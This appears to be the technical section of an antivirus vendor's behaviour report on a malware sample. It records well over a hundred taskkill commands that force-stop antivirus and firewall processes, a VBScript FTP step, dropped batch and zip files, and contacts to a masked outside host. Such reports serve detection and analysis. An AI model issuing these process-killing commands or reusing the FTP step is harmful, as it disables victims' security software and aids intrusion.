Technical Information
- <SYSTEM32>\taskkill.exe /im IBMAVSP.EXE /f /t
- <SYSTEM32>\taskkill.exe /im ICLOAD95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im IAMSERV.EXE /f /t
- <SYSTEM32>\taskkill.exe /im IBMASN.EXE /f /t
- <SYSTEM32>\taskkill.exe /im ICLOADNT.EXE /f /t
- <SYSTEM32>\taskkill.exe /im ICSUPPNT.EXE /f /t
- <SYSTEM32>\taskkill.exe /im IFACE.EXE /f /t
- <SYSTEM32>\taskkill.exe /im ICMON.EXE /f /t
- <SYSTEM32>\taskkill.exe /im ICSUPP95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im IAMAPP.EXE /f /t
- <SYSTEM32>\taskkill.exe /im F-PROT.EXE /f /t
- <SYSTEM32>\taskkill.exe /im F-PROT95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im EXPWATCH.EXE /f /t
- <SYSTEM32>\taskkill.exe /im F-AGNT95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im F-STOPW.EXE /f /t
- <SYSTEM32>\taskkill.exe /im FPROT.EXE /f /t
- <SYSTEM32>\taskkill.exe /im FRW.EXE /f /t
- <SYSTEM32>\taskkill.exe /im FINDVIRU.EXE /f /t
- <SYSTEM32>\taskkill.exe /im FP-WIN.EXE /f /t
- <SYSTEM32>\taskkill.exe /im IOMON98.EXE /f /t
- <SYSTEM32>\taskkill.exe /im NISUM.EXE /f /t
- <SYSTEM32>\taskkill.exe /im NMAIN.EXE /f /t
- <SYSTEM32>\taskkill.exe /im NAVW32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im NAVWNT.EXE /f /t
- <SYSTEM32>\taskkill.exe /im NORMIST.EXE /f /t
- <SYSTEM32>\taskkill.exe /im PADMIN.EOUTPOST.EXE /f /t
- <SYSTEM32>\taskkill.exe /im PAVCL..EXE /f /t
- <SYSTEM32>\taskkill.exe /im NUPGRADE.EXE /f /t
- <SYSTEM32>\taskkill.exe /im NVC95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im NAVNT.EXE /f /t
- <SYSTEM32>\taskkill.exe /im LOOKOUT.EXE /f /t
- <SYSTEM32>\taskkill.exe /im LUALL.EXE /f /t
- <SYSTEM32>\taskkill.exe /im JEDI.EXE /f /t
- <SYSTEM32>\taskkill.exe /im LOCKDOWN2000.EXE /f /t
- <SYSTEM32>\taskkill.exe /im MOOLIVE.EXE /f /t
- <SYSTEM32>\taskkill.exe /im NAVAPW32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im NAVLU32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im MPFTRAY.EXE /f /t
- <SYSTEM32>\taskkill.exe /im N32SCANW.EXE /f /t
- <SYSTEM32>\taskkill.exe /im ESAFE.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVE32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVGCTRL.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AUTODOWN.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVCONSOL.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVKSERV.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVP32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVPCC.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVNT.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVP.EXE /f /t
- <SYSTEM32>\taskkill.exe /im APVXDWIN.EXE /f /t
- <SYSTEM32>\taskkill.exe /im V3LTray.exe
- <SYSTEM32>\taskkill.exe /im V3LSvc.exe
- <SYSTEM32>\ping.exe 127.0.0.1 -n 100
- <SYSTEM32>\wscript.exe "<Current directory>\ftp.vbs"
- <SYSTEM32>\taskkill.exe /im _AVP32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im ACKWIN32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im ANTI-TROJAN.EXE /f /t
- <SYSTEM32>\taskkill.exe /im _AVPCC.EXE /f /t
- <SYSTEM32>\taskkill.exe /im _AVPM.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVPDOS32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im CLAW95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im CLAW95CF.EXE /f /t
- <SYSTEM32>\taskkill.exe /im CFINET.EXE /f /t
- <SYSTEM32>\taskkill.exe /im CFINET32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im CLEANER.EXE /f /t
- <SYSTEM32>\taskkill.exe /im DVP95_0.EXE /f /t
- <SYSTEM32>\taskkill.exe /im ECENGINE.EXE /f /t
- <SYSTEM32>\taskkill.exe /im CLEANER3.EXE /f /t
- <SYSTEM32>\taskkill.exe /im DVP95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im CFIAUDIT.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVPUPD.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVSCHED32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVPM.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVPTC32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVWIN95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im BLACKICE.EXE /f /t
- <SYSTEM32>\taskkill.exe /im CFIADMIN.EXE /f /t
- <SYSTEM32>\taskkill.exe /im AVWUPD32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im BLACKD.EXE /f /t
- <SYSTEM32>\taskkill.exe /im PAVSCHED.EXE /f /t
- <SYSTEM32>\taskkill.exe /im KWatchUI.EXE /f /t
- <SYSTEM32>\taskkill.exe /im KpopMon.EXE /f /t
- <SYSTEM32>\taskkill.exe /im KRegEx.exe /f /t
- <SYSTEM32>\taskkill.exe /im MailMon.EXE /f /t
- <SYSTEM32>\taskkill.exe /im KAVPlus.EXE /f /t
- <SYSTEM32>\taskkill.exe /im CcPwdSvc.exe /f /t
- <SYSTEM32>\taskkill.exe /im CcEvtMgr.exe /f /t
- <SYSTEM32>\taskkill.exe /im CcSetMgr.exe /f /t
- <SYSTEM32>\taskkill.exe /im SNDSrvc.exe /f /t
- <SYSTEM32>\taskkill.exe /im KVMonxp.kxp /f /t
- <SYSTEM32>\taskkill.exe /im OfficeScanNT Personal Firewall /f /t
- <SYSTEM32>\taskkill.exe /im OfficeScanNT /f /t
- <SYSTEM32>\taskkill.exe /im rsccenter /f /t
- <SYSTEM32>\taskkill.exe /im rsravmon /f /t
- <SYSTEM32>\taskkill.exe /im OfcPfwSvc.exe /f /t
- <SYSTEM32>\taskkill.exe /im KMDEVMONSRV.exe /f /t
- <SYSTEM32>\taskkill.exe /im KMdevmonx.exe /f /t
- <SYSTEM32>\taskkill.exe /im KPfwsvc.exe /f /t
- <SYSTEM32>\taskkill.exe /im KAVStart.exe /f /t
- <SYSTEM32>\taskkill.exe /im Srvroam.exe /f /t
- <SYSTEM32>\taskkill.exe /im KAVsvcUI.exe /f /t
- <SYSTEM32>\taskkill.exe /im KAVsvc.exe /f /t
- <SYSTEM32>\taskkill.exe /im RAVmonD.exe /f /t
- <SYSTEM32>\taskkill.exe /im rising.exe /f /t
- <SYSTEM32>\taskkill.exe /im Iparmor.exe /f /t
- <SYSTEM32>\taskkill.exe /im Navapw32.exe /f /t
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\ke.bat" "
- <SYSTEM32>\taskkill.exe /im PFW.exe /f /t
- <SYSTEM32>\taskkill.exe /im Navapsvc.exe /f /t
- <SYSTEM32>\taskkill.exe /im RAVmon.exe /f /t
- <SYSTEM32>\taskkill.exe /im Ccenter.exe /f /t
- <SYSTEM32>\taskkill.exe /im KVwsc.exe /f /t
- <SYSTEM32>\taskkill.exe /im MonXP.exe /f /t
- <SYSTEM32>\taskkill.exe /im KvSrvXP.exeK /f /t
- <SYSTEM32>\taskkill.exe /im KVMonXP.exe /f /t
- <SYSTEM32>\taskkill.exe /im rav.exe /f /t
- <SYSTEM32>\taskkill.exe /im RAVtimer.exe /f /t
- <SYSTEM32>\taskkill.exe /im KVsrvXP.exe /f /t
- <SYSTEM32>\taskkill.exe /im KVFW.EXE /f /t
- <SYSTEM32>\taskkill.exe /im navapsvc /f /t
- <SYSTEM32>\taskkill.exe /im SERV95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im SMC.EXE /f /t
- <SYSTEM32>\taskkill.exe /im SCANPM.EXE /f /t
- <SYSTEM32>\taskkill.exe /im SCRSCAN.EXE /f /t
- <SYSTEM32>\taskkill.exe /im SPHINX.EXE /f /t
- <SYSTEM32>\taskkill.exe /im TCA.EXE /f /t
- <SYSTEM32>\taskkill.exe /im TDS2-98.EXE /f /t
- <SYSTEM32>\taskkill.exe /im SWEEP95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im TBSCAN.EXE /f /t
- <SYSTEM32>\taskkill.exe /im SCAN95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im PCFWALLICON.EXE /f /t
- <SYSTEM32>\taskkill.exe /im PERSFW.EXE /f /t
- <SYSTEM32>\taskkill.exe /im PAVW.EXE /f /t
- <SYSTEM32>\taskkill.exe /im PCCWIN98.EXE /f /t
- <SYSTEM32>\taskkill.exe /im RAV7.EXE /f /t
- <SYSTEM32>\taskkill.exe /im SAFEWEB.EXE /f /t
- <SYSTEM32>\taskkill.exe /im SCAN32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im RAV7WIN.EXE /f /t
- <SYSTEM32>\taskkill.exe /im FESCUE.EXE /f /t
- <SYSTEM32>\taskkill.exe /im TDS2-NT.EXE /f /t
- <SYSTEM32>\taskkill.exe /im TASKM /f /t
- <SYSTEM32>\taskkill.exe /im SCAN /f /t
- <SYSTEM32>\taskkill.exe /im VSHW /f /t
- <SYSTEM32>\taskkill.exe /im VIRUS /f /t
- <SYSTEM32>\taskkill.exe /im NMAIN /f /t
- <SYSTEM32>\taskkill.exe /im ANTIV /f /t
- <SYSTEM32>\taskkill.exe /im Norton AntiVirus Server /f /t
- <SYSTEM32>\taskkill.exe /im F-PROT /f /t
- <SYSTEM32>\taskkill.exe /im AVP /f /t
- <SYSTEM32>\taskkill.exe /im VSS /f /t
- <SYSTEM32>\taskkill.exe /im VSCAN40.EXE /f /t
- <SYSTEM32>\taskkill.exe /im VSECOMR.EXE /f /t
- <SYSTEM32>\taskkill.exe /im VET95.EXE /f /t
- <SYSTEM32>\taskkill.exe /im VETTRAY.EXE /f /t
- <SYSTEM32>\taskkill.exe /im VSHWIN32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im WFINDV32.EXE /f /t
- <SYSTEM32>\taskkill.exe /im ZONEALARM.EXE /f /t
- <SYSTEM32>\taskkill.exe /im VSSTAT,EXE /f /t
- <SYSTEM32>\taskkill.exe /im WEBSCANX.EXE /f /t
- AVP32.EXE
- AVPCC.EXE
- AVGCTRL.EXE
- AVP.EXE
- AVPM.EXE
- ZONEALARM.EXE
- NAVAPW32.EXE
- mpftray.exe
- smc.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\c3.good[1]
- <Current directory>\kelo.zip
- %TEMP%\1.tmp\ke.bat
- <Current directory>\ftp.txt
- from <Current directory>\ftp.txt to <Current directory>\ftp.vbs
- 'c3.#ood.gd':80
- 'localhost':1035
- c3.#ood.gd/?Fi############
- DNS ASK c3.#ood.gd
- ClassName: '' WindowName: ''